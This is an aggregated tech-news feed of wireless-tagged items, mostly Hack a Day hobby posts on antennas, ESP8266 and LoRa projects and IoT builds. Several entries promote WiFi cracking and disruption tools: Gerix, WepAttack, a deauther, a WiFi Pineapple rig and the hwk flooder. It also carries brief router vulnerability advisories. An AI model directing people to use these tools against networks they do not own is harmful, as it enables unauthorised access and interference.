268 items tagged "Wireless"
-
-
9:00
»
Hack a Day
Amazon Dash buttons were the ultimate single purpose networked device; it really can’t get much simpler than a push button that sends a single message to a fixed endpoint. It was an experiment in ultimate convenience, an entry point to a connected home, and a target for critics of consumerism excess and technological overkill.
But soon they’ll be little more than a footnote in the history of online shopping, as CNet reports Amazon will take the order system offline at the end of the month. With the loss of their original intended usage, there’s nothing to stop us from hacking any Dash buttons we can get our hands on.
Of course, this decision should come as little surprise. Amazon’s in-home retail point of sale has graduated from these very limited $5 buttons to Alexa-powered voice controlled devices. Many people also carry a cell phone at all times capable of submitting Amazon orders. While there are many good reasons to be skeptical of internet connected appliances, they’re undeniably finding a niche in the market and some have integrated their own version of a Dash button to re-order household supplies.
But are hackers still interested in hacking Dash buttons? Over the lifespan of Amazon Dash buttons, our project landscape has shifted as well. We’re certainly still interested in the guts of an Echo Dot. But if we wanted to build a simple networked button, we can use devices like an ESP8266, which are almost as cheap and far easier to use. Using something intended for integration means we don’t have headaches like determining which generation of hardware we have.
Despite those barriers, we’ve had many Dash button hacks on these pages. A to-do list updater was the most recent and we doubt it will be the last, especially as Amazon’s deactivation should mean a whole new flood of these buttons will become available for hacking.
[via Ars Technica]
-
-
13:00
»
Hack a Day
WiFi was the killer technology that made home networking easy. No more messing around with hubs and cables and drilling holes in walls, simply turn the devices on and hit connect. Over time the speed and range has increased, but those with larger houses or granny flats out back have suffered. There are tricks to boost range however, and some of them involve cookware.
The clever hack here is to use a metal strainer as a parabolic reflector, to capture signals and focus them onto the PCB antenna in a USB WiFi dongle. The strainer is drilled out, and a USB extension cable has its female end glued into the base. This allows the dongle to be positioned inside the strainer. For best results, the dongle should be positioned so that its antenna elements are sitting at the focal point of the parabola; this can be determined through mathematics or simply by experimenting with positions to see what gives the best signal strength.
It’s a design that is quite directional, and should help boost signals as well as block out those from unwanted stations. The build is simple, and can even be tripod mounted which helps with aiming and looks cool to boot.
For many, WiFi antenna hacks are old school, but it’s always good to keep the techniques in mind as you never know when it will come in handy to solve a new problem. Some crazy things are possible with the right gear, too.
-
-
19:00
»
Hack a Day
The ESP8266 is a great processor for a lot of projects needing a small microcontroller and Wi-Fi, all for a reasonable price and in some pretty small form factors. [Simon] used one to build a garage door opener. This project isn’t really about his garage door opener based on a cheap WiFi-enabled chip, though. It’s about the four year process he went through to learn how to develop on these chips, and luckily he wrote a guide that anyone can use so that we don’t make the same mistakes he did.
The guide starts by suggesting which specific products are the easiest to use, and then moves on to some “best practices” for using these devices (with which we can’t argue much), before going through some example code. The most valuable parts of this guide, especially for anyone starting out with these chips, are the section which details how to get the web server up and running, and the best practices for developing HTML code for the tiny device (hint: develop somewhere else).
[Simon] also makes extensive use of the Chrome developers tools when building the HTML for the ESP. This is a handy trick even outside of ESP8266 development which might be useful for other tasks as well. Even though most of the guide won’t be new to anyone with experience with these boards, there are a few gems within it like this one that might help in other unrelated projects. It’s a good read and goes into a lot of detail about more than just the ESP chips. If you just want to open your garage door, though, you have lots of options.
-
-
16:01
»
Hack a Day
In a move guaranteed to send audiophiles recoiling back into their sonically pristine caves, two doctoral students at ETH Zurich have come up with an interesting way to embed information into music. What sounds crazy about this is that they’re hiding data firmly in the audible spectrum from 9.8 kHz to 10 kHz. The question is, does it actually sound crazy? Not to our ears, playback remains surprisingly ok.
You can listen to a clip with and without the data on ETH’s site and see for yourself. As a brief example, here’s twelve seconds of the audio presenting two versions of the same clip. The first riff has no data, and the second riff has the encoded data.
https://hackaday.com/wp-content/uploads/2019/07/ZTH-no-Filter.mp3
You can probably convince yourself that there’s a difference, but it’s negligible. Even if we use a janky bandpass filter over the 8 kHz -10 kHz range to make the differences stand out, it’s not easy to differentiate what you’re hearing:
https://hackaday.com/wp-content/uploads/2019/07/ZTH-with-8k-10k-filter.wav
After many years of performing live music and dabbling in the recording studio, I’d describe the data-encoded clip as having a tinny feedback or a weird reverb effect. However, you wouldn’t notice this in a track playing on the grocery store’s speaker.
Why Use Audible Frequencies?
Why in the world would you want to use an audible frequency to transmit information? The easy answer is that there are already audible transmitters and receivers everywhere. Specifically, cell phones. According to the researchers, this works better than ultrasonic because cell phone microphones have low sensitivity at high frequencies, and ultrasonic signals attenuate faster than audible ones.
By encoding data into the audible range of music, coffee shops could broadcast their WiFi passwords inside their Sia-heavy playlists. (Why is it always Sia?) Cell phones could then detect the password and automatically connect.
Why it Sounds Fine: OFDM and Masking Frequencies
The original paper goes into more detail, but the system doesn’t wreck the music because it uses the music to mask the data. It detects the strongest frequencies in a track, and embeds data around the harmonics of the frequency. This way, the encoded data simply sounds like it’s part of the music.
Of course, it doesn’t just encode data on one frequency. It uses orthogonal frequency-division multiplexing (OFDM). OFDM essentially spreads the transmission out over multiple carrier frequencies to reduce the power of a single frequency. It’s used in technologies like 4G and 802.11a WLAN. OFDM allows a system to push more power in a band while minimizing the amplitude of specific tones.
Unsurprisingly, the data rates are far from fiber speeds. Using low frequency carriers has its disadvantages. Researchers were able to reach 300 – 400 bits/s (yes, bits not bytes). The transmission distance and accuracy are respectable, though, at 24 meters with less than a 10% bit error ratio. The BER and data rate vary by song, with Queen and the Gorillaz leading the charge.
In the real world they expect about 200 bits/s, which is enough to send roughly 25 words per second. This is fast enough to transmit text info or simple data streams, but you won’t want to browse dank memes with this data link.
Thanks [Qes] for the tip!
-
-
19:00
»
Hack a Day
If you have done any sort of radio work you probably have a fair idea about what antennas do. It is pretty easy to have a cursory understanding of them, too. You probably know there’s something magic about antennas that are a quarter wave long or a half wave long and other multiples. But do you know why that matters? Do you understand the physics of why wire in a special configuration will cause signals to propagate through space? [Learn Engineering] does, and their new video is one of the best graphical explanations of what’s really going on in an antenna that we’ve seen. You can watch the video below.
If you tackle antennas using math, it is a long discussion. However, this video is about 8 minutes long and uses some great graphics to show how moving charges can produce a propagating electromagnetic field.
The 8 minute time limit did however leave us wanting more, as the first part does a great job of explaining charge movement in a dipole but what follows just looks very quickly at some TV, satellite, and cell phone antennas.
This video won’t make you an antenna design expert, but unless you are a guru we will bet you find at least one thing you didn’t know in them. If you want to go further, [Mark Hughes’] introduction has graphics that aren’t quite as slick as these, but still make for a much easier explanation than you’ll find in a textbook. If you do go all in on antennas, modeling them is easier than it used to be, thanks of course to computers.
-
-
11:31
»
Hack a Day
Over the last few months we’ve seen an influx of homebrew RC controllers come our way, and we’re certainly not complaining. While the prices of commercial RC transmitters are at an all-time low, and many of them can even run an open source firmware, there’s still nothing quite like building the thing yourself. How else are you going to get exactly what you want?
For this entry into the 2019 Hackaday Prize, [Vitor de Miranda Henrique] is working on his own version of the ultimate open source remote control. His design follows some of the trends we’ve already seen in terms of outward design and hardware expandability, but also branches off into some new territory with features such as dual integrated displays.
Why does your controller need two displays? The top 4.3 inch TFT is linked up to a 5.2 GHz video receiver, which makes it perfect for controlling vehicles in “first-person” view, such as drones. The lower screen is a 2.8 inch touch screen from Adafruit, which is intended to be used for navigating through menus and options once the firmware is fully fleshed out.
Powering the controller is an ESP32 and dual MCP23017 GPIO expanders to connect up to the array of input devices available to the user. The current iteration of the controller has ten switches, two encoders, some buttons, and a pair of scroll wheels for good measure. Oh, and of course there are a couple of joysticks in the mix as well. All the devices terminate at a custom PCB in the back of the controller which looks to make modifying and adding input devices simple and neat.
We’ve previously seen the Alpha V1, an open source controller with a fairly similar setup, albeit without the dual displays. If even that one is a bit more complex than you’d like, you can always just do it with an Arduino.
-
-
13:00
»
Hack a Day
Interfering with radio communications, whether through jamming, deauthing attacks, or other meddling, is generally considered a crime, and one that attracts significant penalties. However, studying such techniques should provide a useful edge in the electronic wars to come. In this vein, [Giorgio Filardi] has recently built a WiFi deauther the …read more
-
-
22:00
»
Hack a Day
The Internet of Things is upon us, and with that comes a deluge of smart cameras, smart home monitors, and smart home locks. There actually aren’t many smarts in these smart conveniences, and you can easily build your own. That’s what [MakerMan] did with some off-the-shelf parts and just a …read more
-
-
19:00
»
Hack a Day
Many of us have fond memories of our introduction to electronics through the “200-in-1” sets that Radio Shack once sold, or even the more recent “Snap Circuits”-style kits. Most of us eventually move beyond these kits to design our circuits; still, there’s something to be said for modular designs. This …read more
-
-
8:30
»
Hack a Day
Zombies, for the most part, remain fictional and are yet to trouble human communities. Despite the many real world calamities we face, the zombie concept remains a compelling one and the subject of many books, films, and video games. [CNLohr] was at MagStock Eight when he met [Aaron], who has developed a real world game in this vein. (YouTube, embedded below.)
[Aaron]’s game goes by the name of SpyTag, and is played by a group of people who each have a small device affixed to their wrist. Two players start off as zombies, and the rest are humans. The zombies …read more
-
-
1:00
»
Hack a Day
If you’ve ever engaged in social media, you’re familiar with the little thrill you receive when your post, tweet, or project gets a like. But, if logging in feels like too much overhead to obtain your dopamine reward, [pt’s] CircuitPython Hackaday portal may be just what you’re looking for. This project creates a stand-alone counter to display the number of “skulls” (aka likes) received by a project on hackaday.io, and of course, it’s currently counting its own.
The code is running on a SAMD51 (Cortex M4) microcontroller and serving up the skulls on 240×320 TFT display. For WiFi connectivity, the …read more
-
-
22:00
»
Hack a Day
Not long ago, we published an article about researchers adding sensor data to passive RFID tags, and a comment from a reader turned our heads to a consumer/maker version which anyone can start using right away. If you’re catching up, passive RFID technology is behind the key fobs and stickers which don’t need power, just proximity to the reader’s antenna. This is a much “hackier” version that works with discrete signals instead of analog ones. It will not however require writing a new library and programming new tags from the ground up just for the user to get started, so …read more
-
-
8:00
»
Hack a Day
[Nikola Tesla] believed he could wirelessly supply power to the world, but his calculations were off. We can, in fact, supply power wirelessly and we are getting better but far from the dreams of the historical inventor. The mainstream version is the Qi chargers which are what phones use to charge when you lay them on a base. Magnetic coupling is what allows the power to move through the air. The transmitter and receiver are two halves of an air-core transformer, so the distance between the coils exponentially reduces efficiency and don’t even think of putting two phones on a …read more
-
-
22:01
»
Hack a Day
Here at Hackaday, we have to admit to neglecting a few houseplants in our time. Let’s face it… a cold, hard, thinking machine can care for our green friends better than you can. Why not team up? [cabuu]’s WiFi-enabled soil moisture sensor will do the trick in case you, too, want happy plants.
This is one of those projects which would have been much more difficult even five years ago, and really shows how lucky we are to have accessible technology at our fingertips. It’s conveniently constructed from off-the-shelf electronics modules, and nestled inside a 3D-printed case. The design is …read more
-
-
12:17
»
Darknet

Gerix WiFi Cracker is an easy-to-use Wireless 802.11 Hacking Tool with a GUI. It was originally made to run on BackTrack, and this version has been updated for Kali (2018.1).
To get it up and running make sure you do:
apt-get install qt4-dev-tools
Running Gerix Wireless 802.11 Hacking Tool
$ python gerix.py
You can download Gerix here:
gerix-wifi-cracker-master.zip
Or read more here.
Read the rest of Gerix WiFi Cracker – Wireless 802.11 Hacking Tool With GUI now! Only available at Darknet.
-
-
5:47
»
Darknet

WepAttack is a WLAN open source Linux WEP key hacking tool for breaking 802.11 WEP keys using a wordlist based dictionary attack.
This tool is based on an active dictionary attack that tests millions of words to find the right key. Only one packet is required to start an attack.
What is a WEP Key?
Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.[1] WEP, recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits), was at one time widely in use and was often the first security choice presented to users by router configuration tools.
Read the rest of WepAttack – WLAN 802.11 WEP Key Hacking Tool now! Only available at Darknet.
-
-
22:00
»
Hack a Day
[Mare] has a visual guide and simple instructions for making DIY mini helical 868 MHz antennas for LoRa applications. 868 MHz is a license-free band in Europe, and this method yields a perfectly serviceable antenna that’s useful where space is constrained.
The process is simple and well-documented, but as usual with antenna design it requires attention to detail. Wire for the antenna is silver-plated copper, salvaged from the core of RG214U coaxial cable. After straightening, the wire is wound tightly around a 5 mm core. 7 turns are each carefully spaced 2 mm apart. After that, it’s just a matter …read more
-
-
4:00
»
Hack a Day
Sometimes you need to hack on the go. [Supertechguy] has put together an interesting system for hacking on the hoof called the Pineapple Pi. This combines a Raspberry Pi 3 with a seven-inch touchscreen and a Hak 5 WiFi Pineapple into a handy portable package that puts all of the latest WiFi and ethernet hacking tools to hand. The package also includes a 20,100 mAh battery, so you won’t even need a wall socket to do some testing. It’s a bit of a rough build — it is held together with velcro, for instance — but it’s a good place …read more
-
-
22:00
»
Hack a Day
If it’s stupid and it works, then it’s not stupid. There’s no better evidence of that than [Tobias]’ networking setup.
He recently had to distribute Ethernet through a building, and there are a few ways to do that. You can use regular ‘ol twisted pair, or fiber, but in this case running new cables wasn’t possible. WiFi would be the next obvious choice, but the distance was just a bit too far for ‘regular’ WiFi links. Ethernet over power lines was an option, but there are amateur radio operators in the house, and they put out a bunch of interference and …read more
-
19:01
»
Hack a Day
Back in the early days of Arduino proliferation (and before you ask, yes we realize there was a time before that too), wireless was a strange and foreign beast. IR communication was definitely a thing. And if you had the funds there was this cool technology called ZigBee that was available, often in funny blue house-shaped XBee boards. With even more funds and a stomach for AT commands you could even bolt on a 2G cell radio for unlimited range. WiFi existed too, but connecting it to a hobbyist ecosystem of boards was a little hairier (though maybe not for …read more
-
-
19:01
»
Hack a Day
LoRa is the new hotness in low-power, long-range communications. Wanting to let the packets fly, [Xose] was faced with a frequency problem and ended up developing a Europe-friendly LoRa module for the M5Stack system. The hardware is aimed at getting onto The Things Network, a LoRa based network that provides connectivity for IoT devices. While there was an existing M5Stack module for LoRa, it only supported 433 MHz. Since [Xose] is in Europe, an 868 MHz or 915 MHz radio was needed. To solve this, a custom board was built to connect the HopeRF RFM69 series of modules to the …read more
-
-
22:00
»
Hack a Day
Powering IoT devices is often a question of batteries or mains power, but in rare exceptions to this rule there is no power supply (PDF Warning). At the University of Wisconsin-Madison and the University of California, San Diego, researchers have gone the extra mile to make advanced backscatter devices, and these new tags don’t need the discrete components we have seen in previous versions. They are calling it LiveTag, and it doesn’t need anything aside from a layer of foil printed or etched on a flexible ceramic-PTFE laminate. PTFE is mostly seen in the RF sector as a substrate for …read more
-
-
16:00
»
Hack a Day
Over the years, we’ve seen dozens of projects that sell themselves as an ‘Open Source’ cellphone, a hackable cellphone, or some other confabulation of a microcontroller, screen, and a cellular module. The WiPhone is not one of these projects. That’s not to say it’s not an Open Source phone that’s intended to be hackable. No, this is a DIY phone that doesn’t make cellular calls, because this is a phone that only works with SIP and VoIP apps. It’s a WiPhone, and something a lot of us have been waiting for.
The hardware for this WiFi enabled phone is extremely …read more
-
-
22:00
»
Hack a Day
It’s now possible to not only see people through walls but to see how they’re moving and if they’re walking, to tell who they are. We finally have the body scanner which Schwarzenegger walked behind in the original Total Recall movie.
This is the work of a group at the MIT Computer Science and Artificial Intelligence Laboratory (CSAIL). The seeing-through-the-wall part is done using an RF transmitter and receiving antennas, which isn’t very new. Our own [Gregory L. Charvat] built an impressive phased array radar in his garage which clearly showed movement of complex shapes behind a wall. What is …read more
-
-
1:00
»
Hack a Day
It used to be homebrew ham gear meant something simple. A couple of active devices that could send CW. Maybe a receiver with a VFO. But only the most advanced builders could tackle a wide range SSB transceiver. Today, that goal is still not trivial, but it is way easier due to specialty ICs, ready access to high-speed digital signal processing, and advances in software-defined radio techniques. [Charlie Morris] decided to build an SSB rig that incorporated these technologies and he shared the whole process from design to operation in a series of nine videos. You can see the first …read more
-
-
4:00
»
Hack a Day
[Kathy] recently posted an interesting video about the connection of an electronics pioneer named [Hertha Ayrton] to the arc transmitter. The story starts with the observation of the arc lamp — which we learned was a typo of arch lamp.
[Hertha] was born into poverty, but — very odd for the day — obtained a science education. That’s probably a whole story in and of itself. During her schooling, she fell in love with her professor [William Ayrton] and they wed.
[Hertha] took over her husband’s research into arcs and made impressive results in understanding the physics of an arc. The …read more
-
-
13:00
»
Hack a Day
If you want to retrofit your home with smart outlets and lightbulbs, bust out your wallet. You can easily spend forty dollars for a smart light bulb at your local home supply store, and strips of smart sockets could cost sixty. When [coogle] found a WiFi-enabled four-outlet power strip on Amazon, he couldn’t resist. Sure, the no-name strip would be locked down behind a stupid iPhone interface and will probably turn your house into a botnet, but never mind that: you can easily reprogram these power strips to be whatever you want.
After receiving these power strips and tearing them …read more
-
-
4:00
»
Hack a Day
We talk a lot about information security around here, but in reality it’s not at the forefront of everyone’s minds. Most people are content to walk around with their phones constantly looking for WiFi or Bluetooth connections despite the dangers. But if you’re not a black hat sort of person, you can do something like [Verkehrsrot] did and use all of these phones to do something useful and harmless.
[Verkehrsrot]’s project involves building a radio listening device in order to get an estimate of the amount of traffic in a particular area. The device polls for and detects WiFi and …read more
-
-
1:00
»
Hack a Day
Temperature is a delicate thing. Our bodies have acclimated to a tight comfort band, so it is no wonder that we want to measure and control it accurately. Plus, heating and cooling are expensive. Measuring a single point in a dwelling may not be enough, especially if there are multiple controlled environments like a terrarium, pet enclosure, food storage, or just the garage in case the car needs to warm up. [Tim Leland] wanted to monitor commercially available sensors in several rooms of his house to track and send alerts.
The sensors of choice in this project are weather resistant …read more
-
-
16:00
»
SecuriTeam
Broadcom BCM4325 and BCM4329 Wireless Chipsets are prone to a denial-of-service vulnerability.
-
-
8:01
»
Hack a Day
[Texane] picked up a 2.4 GHz transmitter/receiver pair for transmitting sensor data wirelessly. After using them in a project he wanted to try pushing them a bit to see what the limits are when it comes to higher bandwidths. He ended up building a wireless speaker that transmits audio at about 90 KB/s. That link [...]
-
-
5:00
»
Hack a Day
When schools and universities have hundreds of students in a lecture course, they need a way to tell alumni and other potential benefactors that faculty/student relations are just as good as they were in the 1960s, when enrollment was just a fraction of current levels. Technology solves all problems, apparently, so administrators of these universities turn to ‘clickers’ [...]
-
-
9:01
»
Hack a Day
[Chris] set out to build a monitoring system for his water heater. It doesn’t Tweet or send SMS messages. It simply lights up an LED when the water heater is active. The one thing that complicates the setup is that he didn’t want to pull any wire from the garage into the house. What you [...]
-
-
17:00
»
SecuriTeam
Netcomm BigPond Wireless Broadband Gateway is prone to an authentication-bypass vulnerability and a command-injection vulnerability.
-
-
6:00
»
Carnal0wnage
I needed to make a map of the access points for a client. Since I can't show that map, I made another using the same technique.
First take your handy dandy Android device and install
Wigle Wifi Wardriving.
It uses the internal GPS and wifi to log access points, their security level and their GPS position.
Looks like this (yup, I stole these)

List of access points

Also makes a cute map on your phone
Once you have the APs you can export out the "run" from the data section. Yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.

With the KML export you can import that directly into Google Earth and make all sorts of neat maps by toggling the data.

All Access Points

Open Access Points

WEP Encrypted Access Points
That's it.
-CG
-
-
5:01
»
Hack a Day
We see a lot of quadcopters, and even the occasional octocopter around here. But this build does it with just two propellers. It’s a tiltrotor build which allows the two upward-pointing propellers to tilt forward and backward. The real world equivalent of this UAV design that pops to mind is the V-22 Osprey. The motors are [...]
-
-
7:01
»
Hack a Day
For those of you that don’t know, the Heathkit HERO (Heathkit Educational Robot) was a ‘bot built in the early 1980s. [Rick] wasn’t satisfied with his model ETW-18’s programming interface, so decided to upgrade it to be able to run Python using a hacked wireless router. We’d agree that things have advanced since then, since [...]
-
-
8:01
»
Hack a Day
A while ago we caught wind of the Electric Imp, a very cool little device that packs an ARM microcontroller and a WiFi adapter into an SD card. We got our hands on an Imp last week, and now it’s time to show off what this little device can do. You can check out the [...]
-
-
15:37
»
Packet Storm Security Exploits
Alpha Networks ADSL2/2+ Wireless Router version ASL-26555 suffers from a remote administration password disclosure vulnerability. Tested on firmware version 2.0.0.30B_ES.
-
-
10:01
»
Hack a Day
Turns out you don’t need to be Superman to see through walls. Researchers at University College London have developed a way to passively use WiFi as a radar system. Unlike active radar systems (which themselves send out radio waves and listen for them to echo back), passive radar systems cannot be detected. The system is [...]
-
-
9:00
»
Hack a Day
While cruising the Internet one day, [Raj] found a really cool pair of RF transmitters and receivers manufactured by Dorji Applied Technology. These modules – the DRF5150S and DRF4432S – work just like any other ISM band transmitter receiver pair with the addition of inputs for analog and digital input pins. [Raj] put together a tutorial for using these radio modules, perfect if [...]
-
-
10:01
»
Hack a Day
Although we’ve featured quite a few MAME controllers here, we thought we’d feature one more. It’s only a well-drawn mechanical plan at this point, but if the results are anything like the model or detail drawing, we will be quite impressed. One thing that is of particular interest is the planned parts list. Amongst them [...]
-
-
8:01
»
SecuriTeam
'Trango Broadband Wireless Rogue SU Authentication Bug'
-
-
6:01
»
Hack a Day
This 3d printed case houses the already small [TP-Link TL-WR703N] but also makes room for a custom expansion board. The expansion board is designed to make the device more hacker friendly, and who doesn’t need a nice case to hold it? Since the router board already has a USB port (intended for use with USB 3G [...]
-
-
7:01
»
Hack a Day
The guys over at embdSocial sent in a project they’ve been working on for a while. It’s a small wifi module for an Arduino or other microcontroller called Wisp. Unlike the many, many other wifi breakout boards we’ve seen, the Wisp has a truly incredible amount of potential. With an API that allows an Arduino [...]
-
-
11:01
»
Hack a Day
Ah, the days when a television was a solid piece of furniture. When it comes to moving, we can’t say we miss it. But looking at this wooden TV cabinet with storage for its 7-function remote we can’t help but think that today’s TVs seem more… trivial… when it comes to the layout of the [...]
-
-
15:01
»
Hack a Day
The NRF 24L01+ radio transceiver can be found in a lot of wireless project builds. But it’s only meant to work at a range of a few meters. [Achu Wilson] found that he could greatly extend the range by as much as 2 kilometers. All he needed to do was build this high-gain antenna. He already [...]
-
-
10:02
»
Hack a Day
Despite the obvious use of a lot of wire, this project is actually a wireless charging system. [Jared] built it as a way to explore the concepts behind transferring power inductively. Alternating current on one of the white coils induces current on the other. This is then rectified, and regulated for use as a 5V charger. In this [...]
-
-
10:06
»
Hack a Day
Most of the quadcopter projects that we’ve seen use a joystick-based control system. This lets you fly the thing around like any RC vehicle. But [Saulius] is augmenting his control system by pulling and displaying telemetry data. It doesn’t really change the way the vehicle is controlled, but it lets the craft roam much further [...]
-
-
10:02
»
Hack a Day
Years ago, someone at [Chuck]’s job came up with the brilliant solution of an indicator to display if the unisex bathroom is currently vacant, a men’s bathroom, or a women’s bathroom. The old system worked well, but [Chuck] thought it would be a great idea to display the current status of the bathroom on the [...]
-
-
9:01
»
Hack a Day
[Jeff] from Gadget Gangster sent in a great tutorial on connecting a cheap Bluetooth module to a Parallax microcontroller. In addition to getting a terminal to the Propeller up and running from his computer, [Jeff] was able to toggle IO pins and even control servos and Android devices – perfect for your next wireless robot. [...]
-
-
14:01
»
Hack a Day
[Roel] wanted to put a wireless weather station in his greenhouse. Even though the weather station was supposed to transmit over fairly long distances, the geometry of his back yard and a few stone walls killed the radio signal even after putting a good antenna on the receiving side of his wireless weather station setup. [...]
-
-
9:06
»
Hack a Day
[Chris] put together a bunch of common components to create this wireless pan and tilt system for a security camera or a robot. The motorized base is simple enough, using two servos to make up a mount for the digital camera. In this case he used a parts package which is designed to mount the servos [...]
-
-
9:01
»
Hack a Day
[Peter Sobey] had a solar hot water heater installed in his home, which worked great until he relocated his kitchen to a neighboring room. Now a good bit further from the tank, the hot water reaching his sink was tepid at best due to the increased distance and temperature limiting mixer valve in the new [...]
-
-
15:01
»
Hack a Day
It looks like a genetic leap has unleashed the age of mutants, but this is really just a few guys trolling New York City with some custom RC aircrafts. The video after the break shows the fliers up close. They’re pretty much full size, we’d guess 5’10″ from head to heel. The outstretched arms and [...]
-
-
9:01
»
Hack a Day
Remember those old wireless controllers made for the consoles of our youth like the NES and Super Nintendo? They didn’t work well, mostly owing to the fact they were built using the same infrared technology that is found in a remote control. Now that all the modern consoles are wireless, [micro] over at the nftgames [...]
-
-
9:01
»
Hack a Day
[Abhimanyu Kumar] has been hard at work building and posting about his quadcopter. So far he’s published ten installments for this build, letting us relive the adventure vicariously. But it’s number 11 that we’re really excited about as he plans to share the first free-flight footage in that one. The bug was planted in his [...]
-
-
6:28
»
Hack a Day
Servo control is good, but wireless control is even better. This hack by [PyroElectro Tutorials] shows you how to do this wirelessly using two Xbee modules. There’s also a great example in the video after the break of this “hacking platform” used to control an animatronic head’s eyes. (we’ve featured the eyes here before). In [...]
-
-
15:47
»
Packet Storm Security Recent Files
hwk is used for wireless audits, fuzzing and stress testing under Linux. It provides various modes such as wireless deauthentication and authentication flooding using a monitor mode interface as well as probe response and beacon fuzzing. Furthermore it comes with some basic injection testing and focusing modes.
-
-
8:11
»
Hack a Day
The Nike+ hardware is obviously an interesting device. We haven’t heard a whole lot about hacking one until now, but [Dimitry] has decided to change that. Many would assume that the data transmitted off of these sensors is quite simple, however there’s a bit more than meets the eye. Amongst other challenges, all the data [...]
-
-
10:11
»
Packet Storm Security Recent Files
This paper examines network layer security provided by IPSec and link layer security provided by WPA, addressing the characteristics of each approach when applied to wireless networks. It also discusses types of attack done on Wireless/Wi-Fi and security mitigations.
-
-
4:04
»
Hack a Day
Hackaday reader [equinoxefr] posted some images to our flickr pool showing off some modifications he made (Google Translation) to his La Crosse WS2305 weather station. Having built other router-based weather stations in the past, [equinoxefr] was looking for a better way to gather weather data after one of the routers gave up the ghost. With a brand [...]
-
-
8:01
»
Hack a Day
This bluetooth headset hack, although simple, may provide some hacking inspiration. Turning a Bluetooth headset into a wireless input for one’s stereo is definitely something that makes one think “why didn’t I think of that?” It’s also good if you’ve got a tight hacking budget as there’s not a lot of stuff to buy. In [...]
-
-
8:01
»
Hack a Day
There’s something calming about looking up into the night sky and seeing an array of shining stars off in the distance. [Marou] is a big fan of stargazing, but sometimes conditions are not optimal, so he decided to bring the stars inside. His idea was to build a ceiling lamp that didn’t bask the room [...]
-
-
10:01
»
Hack a Day
[Mr.Pantz] pointed us to a web page we thought you would find interesting. It deals with hacking a PC lock using a Universal Software Radio Peripheral (USRP). Following the good practice of logging off or locking your workstation while you’re not at it, it is darn hard to get users to actually do it. These [...]
-
-
10:01
»
Hack a Day
The wooden frame seen above hosts a parabolic reflector making up one side of a wireless network link. This is a Fab Lab project called FabFi which uses common networking hardware to setup long-distance wireless Ethernet connections. It’s a bit hard to tell in the image above, but the reflector focuses radio waves on the [...]
-
-
4:06
»
Hack a Day
We love ballistic trajectories and the smell of black powder in the morning, so we’re really interested in the wireless rocket launch pad sent in by [Brent Strysko]. [Brent] used an ATmega with an enc28j60 ethernet shield and wireless router to launch the rocket without a physical connection with ‘the button.’ Everything on the launchpad [...]
-
-
4:05
»
Hack a Day
[AUTUIN] sent in a tip for his wifi sniffing digital picture frame. A soon-to-be-trashed Pentium II laptop was rescued from Free Geek Vancouver. A lot of coffee shops around Vancouver feature local art and free wifi, so [AUTUIN] decided to combine the two. The project is designed to hang on the wall of a cafe [...]
-
-
15:01
»
Hack a Day
It’s no secret that wireless mice can eat through batteries pretty quickly. Rather than keep a fresh supply of AAs on hand at all times, [Phil] decided he would convert his mouse to use a rechargeable lithium polymer battery instead. This isn’t the first time we’ve seen a cell phone battery crammed into a mouse [...]
-
-
4:06
»
Hack a Day
We never really get bored with remote-controlled rovers around here, especially when they involve reusing some old hardware as well as lasers. [Tycoon] wrote in to share his creation, which he has dubbed “Texas Ranger”. Texas Ranger is built around an old Linksys WRT54GL router, which provides the rover’s WiFi connectivity as well as the [...]
-
-
12:22
»
Hack a Day
Hackerspaces are always looking for novel ways to let their members know that they are open for business, and this notifier [Angus] from Make, Hack, Void recently put together is no exception. While dumpster diving one day, he came across a fantastic-looking lab power supply from the ‘70s. He gutted it, saving the variable transformer [...]
-
-
10:10
»
Hack a Day
What do you do when you can’t afford broadband and no-cost WiFi is just out of reach? That was the problem Rice University grad student [Ryan Guerra] was tasked with solving. A local Houston resident could barely tap into the free service offered in her area, so [Ryan] set out to extend the signal’s range [...]
-
-
4:03
»
Hack a Day
[Wes] built a cool looking Tactical Wifi Cantenna with some parts from a broken airsoft pistol. The antenna is a cookie can type with an added cone to increase performance, as seen in this tutorial. Once the antenna was built it was time to add some kind of handle, [Wes] just so happened to have [...]
-
-
6:01
»
Hack a Day
So let’s say you have a submarine, or a nuclear containment chamber which has walls made of thick metal. Now let’s say you want to transmit power or data through this wall. Obviously you’re not going to want to drill a hole since this wall is either keeping seawater out, or potential contamination in, but [...]
-
-
15:45
»
Hack a Day
In Colorado, amateur luge competitions are serious business. Every winter, [Ryan's] friends dig a long luge track through the many feet of snow that occupies their yard, and have competitive sled races to see who can make it down the giant hill in the least time. They call it the Mario Cup, after one of [...]
-
-
6:35
»
Hack a Day
[Mike] sent in a tip about Newstweek, and we’re turning to our readers to tell us if this is real or if we’re being trolled. The link he sent us points to a well-written news-ish article about a device that plugs into the wall near an open WiFi hotspot and performs something of a man-in-the-middle attack on devices [...]
-
-
12:00
»
Hack a Day
Don’t just build a UAV, use it to blow things up. In this case a tri-copter seeks out colored balloons and pops them using low-grade fireworks. We’ve seen this type of flying armament before, but not in a ‘copter form factor. It looks like the targeting and firing is done by an operator, and is [...]
-
-
14:00
»
Hack a Day
Yep, these cereal boxes light up. They’re using a new branded-technology called eCoupling that provides electricity via induction, which means the shelves have a coil with AC power running through it. The “printed coils” on the boxes allow inventory control and data exchange presumably thanks to a low-power microcontroller. But in the video after the [...]
-
-
14:00
»
Hack a Day
The ubiquitous presence of wireless devices combined with easy access to powerful RF development platforms makes the everyday world around us a wireless hacker’s playground. Yesterday [Travis Goodspeed] posted an article showing how goodfet.cc can be used to sniff wireless traffic and also to jam a given frequency. We’ve previously covered the work of [Travis] [...]
-
-
12:18
»
Hack a Day
The challenge: can you build a flying turkey that drops pumpkin pie bombs? That’s the question that Utah Aerials asked themselves and they did manage to make it happen. Of course they’re not starting from scratch, but adding a little holiday cheer to an existing quadcopter in the form of a spray painted turkey fuselage. [...]
-
-
10:00
»
Hack a Day
Tired of hearing that flat sounding wireless doorbell when visitors happen to come by? Don’t get rid of it, improve it by adding a real bell. This hack rigs up a small hand bell to the wireless doorbell receiver. It was prototyped using LEGO pieces to shake the sound out of the bell, but the [...]
-
-
8:00
»
Hack a Day
More and more today, it is becoming harder to avoid having some sort of RFID tag in your wallet. [bunnie], of bunnie:studios decided to ease the clutter (and wireless interference) in his wallet by transplanting the RFID chip from one of his subway cards into his mobile phone. Rather than the tedious and possibly impossible [...]
